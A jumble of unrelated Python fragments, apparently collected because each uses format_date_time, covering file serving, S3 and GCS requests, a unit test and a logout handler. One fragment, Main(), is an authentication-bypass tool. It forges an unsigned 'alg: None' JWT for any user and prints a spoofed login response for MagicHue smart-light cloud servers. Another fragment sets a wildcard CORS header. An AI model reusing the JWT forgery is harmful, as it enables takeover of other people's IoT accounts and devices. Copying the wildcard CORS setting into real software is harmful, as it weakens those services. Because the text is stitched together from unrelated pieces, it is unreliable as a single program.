def send_preamble(self): """Transmit version/status/date/server, via self._write()""" if self.origin_server: if self.client_is_modern(): self._write('HTTP/%s %s\r\n' % (self.http_version, self.status)) if 'Date' not in self.headers: self._write('Date: %s\r\n' % format_date_time(time.time())) if self.server_software and 'Server' not in self.headers: self._write('Server: %s\r\n' % self.server_software) # reggie: add these for ajax cross domain request self._write('Access-Control-Allow-Origin: %s\r\n' % '*') self._write('Access-Control-Allow-Methods: %s\r\n' % 'GET, POST, PUT, DELETE') self._write('Access-Control-Allow-Headers: %s\r\n' % 'Content-Type') # end of change else: self._write('Status: %s\r\n' % self.status)
def get(self, request, path): #logger.info('writing path') #logger.info(path) #path = urllib.unquote(path) #f = open("/var/log/datastage/other.log", 'w') #f.write(path) #f.write(path1) #f.close() with self.access_error_handler(): stat = os.stat(self.path_on_disk) mimetype, encoding = mimetypes.guess_type(self.path_on_disk) response = HttpResponse(open(self.path_on_disk, 'rb'), mimetype=mimetype) response['Last-Modified'] = format_date_time(stat.st_mtime) response['Content-Length'] = stat.st_size if not mimetype: del response['Content-Type'] return response
def upload_to_s3(aws_key, aws_secret, bucket, filename, contents, mimetype): timestamp = format_date_time(datetime.now().timestamp()) string_to_sign = '\n'.join([ 'PUT', '', mimetype, timestamp, 'x-amz-acl:public-read', '/' + bucket + '/' + filename ]) signed = b64encode( hmac.new(aws_secret.encode('utf-8'), string_to_sign.encode('utf-8'), sha1)).digest().decode('utf-8') headers = { 'Authorization': 'AWS ' + aws_key + ':' + signed, 'Content-Type': mimetype, 'Date': timestamp, 'Content-Length': len(contents), 'x-amz-acl': 'public-read' } conn = HTTPConnection(bucket + '.s3.amazonaws.com') conn.request('PUT', filename, contents, headers) return (conn.getresponse(), 'http://' + bucket + '.s3.amazonaws.com/' + filename)
def Main(user, uniqid): os.system('clear') print("[+] Encoding ...") print("[+] Bypass header created!") print("HTTP/1.1 200") print("Server: nginx/1.10.3") print("Date: " + str(format_date_time(stamp)) + "") print("Content-Type: application/json;charset=UTF-8") print("Connection: close\r\n\r\n") jwt_header = '{"typ": "JsonWebToken","alg": "None"}' jwt_data = '{"userID": "' + user + '", "uniID": "' + uniqid + '","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}' jwt_headerEncoded = url64.encode(jwt_header.strip()) jwt_dataEncoded = url64.encode(jwt_data.strip()) jwtcombined = (jwt_headerEncoded.strip() + "." + jwt_dataEncoded.strip() + ".") print( "{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"" + user + "\",\"userEmail\":\"" + user + "\",\"userUniID\":\"" + uniqid + "\"},\"token\":\"" + jwtcombined + "\"}")
def test_local_file_download_wauth(self, mock_urlopen): '''To see that the checkChunks accepts an auth argument''' mock_urlopen.return_value = FakeReq('test resp') (self.temp_file, md5, mime_type) = md5s3stash.checkChunks(self.testfilepath, auth=('username', 'password')) # mock_urlopen.reset_mock() file = os.path.join(DIR_FIXTURES, '1x1.png') # print "last modified: %s" % time.ctime(os.path.getmtime(file)) lmod = format_date_time(os.path.getmtime(file)) mock_urlopen.assert_called_once_with( file, auth=('username', 'password'), cache={ self.testfilepath: { u'If-None-Match': "you're it", u'If-Modified-Since': lmod, u'md5': '85b5a0deaa11f3a5d1762c55701c03da' } })
def logout(self, **params): authid = self.get_authid() user = get_user_by_authid(authid, db) now = datetime.now() stamp = mktime(now.timetuple()) expires = format_date_time(stamp) #--> Wed, 22 Oct 2008 10:52:40 GMT cherrypy.response.headers['Set-Cookie'] = 'authid='+str(user.authid)+'; SameSite=None; Secure; expires='+expires if "delete" in params: if params["delete"] == "true": user_reviews = Review.select().where(Review.user==user) for review in user_reviews: ReviewScore.delete().where(ReviewScore.review == review).execute() ReviewScore.delete().where(ReviewScore.user == user).execute() Review.delete().where(Review.user == user).execute() user.delete_instance() return "logged_out_and_deleted" return "logged_out"
def _get_parameters(self, if_modified_since=None, generation=None, **_): """Calculates the params for the request.""" base_url = self.to_path() url_endpoint = ('https://storage.googleapis.com/%s' % base_url) headers = self.headers.to_primitive(False) headers["Authorization"] = ( "Bearer " + self._config.server.service_account.oauth_token) headers["Cache-Control"] = "private" if if_modified_since: headers["If-Modified-Since"] = handlers.format_date_time( if_modified_since) params = {} generation = generation or self.generation if generation: params["generation"] = generation return url_endpoint, params, headers, base_url